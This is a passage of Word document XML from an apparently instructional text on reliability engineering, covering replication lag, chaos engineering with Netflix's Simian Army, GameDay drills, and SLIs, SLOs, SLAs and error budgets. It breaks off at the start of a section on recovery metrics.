    <w:p w14:paraId="469B4C29" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication lag at failover:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> If the promoted replica was lagging behind the primary, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all writes in the replication lag window are lost</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. This is the RPO (Recovery Point Objective) — the maximum amount of data loss acceptable. With synchronous replication (primary waits for at least one replica to confirm before acknowledging writes), replication lag is zero but write latency increases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC58993" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="0E56A63B">
          <v:rect id="_x0000_i2154" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3BAD96" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Chaos Engineering — Testing Availability Proactively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F1D86" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The core philosophy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Failures are inevitable. The question is not </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> your system fails, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>whether you discover the failure mode in production at 3 AM or in a controlled experiment during business hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269C62D7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Chaos engineering proactively </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>injects failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> into production systems to verify that redundancy and recovery mechanisms work as designed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58889EAE" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos Monkey and Beyond (Netflix Chaos Engineering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C6B7B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Netflix's Simian Army:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F4013D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos Monkey:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Randomly terminates EC2 instances in production during business hours. Forces engineering teams to design stateless, fault-tolerant services — if you know Chaos Monkey may kill your instance at any time, you cannot rely on local state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE03370" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos Gorilla:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Simulates an entire AWS Availability Zone failure. Tests cross-AZ redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772224F4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chaos Kong:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Simulates an entire AWS region failure. Tests multi-region failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F0999A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency Monkey:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Introduces artificial network latency between services. Tests timeout handling, circuit breakers, and whether services degrade gracefully under slow dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7041979D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure Injection Principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6246D1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start small:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Begin with non-production environments. Graduate to production only after developing confidence in recovery mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18437F3E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Define steady state:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Before injecting failure, define what "normal" looks like — baseline error rate, p99 latency, request throughput. After failure injection, verify the system returns to steady state within an acceptable time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707533A7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Minimize blast radius:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Start with low-traffic periods, small percentages of traffic, non-critical user segments. Expand gradually as confidence grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4B8E78" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automated rollback:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Chaos experiments should have </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>automatic abort conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — if impact exceeds predefined thresholds (error rate exceeds 1%, latency exceeds 500ms p99), the experiment automatically terminates and the injected failure is removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA574B8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GameDay Exercises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727BC2F5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Scheduled, planned failure drills. An entire team practices responding to a simulated major outage — primary database fails, region goes down, DDoS attack. Tests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F3249F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Are runbooks accurate and up-to-date?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0A5BA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Can on-call engineers execute failover procedures correctly under pressure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1172B2BB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Are monitoring and alerting systems actually detecting the failure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783F6175" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>What is the real MTTR (Mean Time To Recovery), not the theoretical MTTR?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328AC82E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="2D33CDF9">
          <v:rect id="_x0000_i2155" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="112E5E29" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. SLOs, SLAs, Error Budgets — The Operational Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADF0F61" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLI (Service Level Indicator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5DD6D4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>quantitative measure</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> of service behavior. The raw metric:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D074DA6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Request success rate: successful_requests / total_requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3A897C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Latency: p99 latency &lt; 200ms (what fraction of requests meet this threshold)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB92C05" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Availability: uptime / total_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA8AB7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>Throughput: requests_per_second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19087296" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>SLIs must be measured from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user's perspective</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>, not the server's perspective. A request that times out at the load balancer is a failure even if the backend server logged it as a success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7420B1BE" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLO (Service Level Objective)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254FAA48" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target value</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> for an SLI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C444121" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>"99.9% of requests will succeed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618378EF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>"p99 latency &lt; 200ms for 99.5% of minutes in a rolling 30-day window"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC36309" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>"System will be available 99.95% of the time in each calendar month"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BB0D8F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>SLOs are </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>internal commitments</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — agreements within the engineering organization about what level of reliability to target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004171E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLA (Service Level Agreement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F7B085" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>An </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>external contract</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> with customers, usually with financial penalties for violations. SLAs are typically set </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lower than SLOs</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — the SLA is what you're contractually obligated to; the SLO is what you actually aim for, giving yourself a buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143B90E5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If your SLO is 99.9%, your SLA might be 99.5% — giving you a 0.4% buffer before you owe customers credits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C326BF8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error Budget — The Key Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4564ED93" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFAEA22" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Error Budget = 1 - SLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F4E9FF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If SLO = 99.9%, error budget = 0.1% = </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>43.8 minutes per month</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> of allowable downtime/errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C1DF10" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error budget is a tool for balancing reliability and velocity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4997335E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Budget remaining:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Engineering team can take risks — deploy new features, try new infrastructure, move fast. You have downtime headroom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489A6CB9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Budget nearly exhausted:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Engineering team must slow down — no risky deployments, focus on reliability improvements, fix technical debt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6749CB4C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Budget exhausted:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> No more production changes until next month. All energy goes to reliability. Any deployment that isn't a critical hotfix is frozen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15091780" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The genius of error budgets:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> It transforms the reliability vs velocity debate from a political argument ("Operations says no, Engineering says yes") into a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data-driven policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. Both sides agree upfront on the error budget. When the budget runs out, the policy (not a person) says deployments stop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D74AC4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error budget burn rate:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Monitoring how fast you're consuming your error budget. If you've consumed 50% of your monthly budget in the first week, you're burning at 4x the sustainable rate — alarm systems fire, teams escalate. Google SRE recommends paging on burn rate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165BFCB3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5% of budget burned in 1 hour</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> → page immediately (incident likely in progress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FA1B0B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2% of budget burned in 6 hours</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> → page (elevated burn rate, investigate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC61CB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10% of budget burned in 3 days</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> → ticket (trending toward budget exhaustion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517078B2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="37718733">
          <v:rect id="_x0000_i2156" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D3173C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Recovery Metrics — MTBF, MTTR, RTO, RPO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572F3914" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
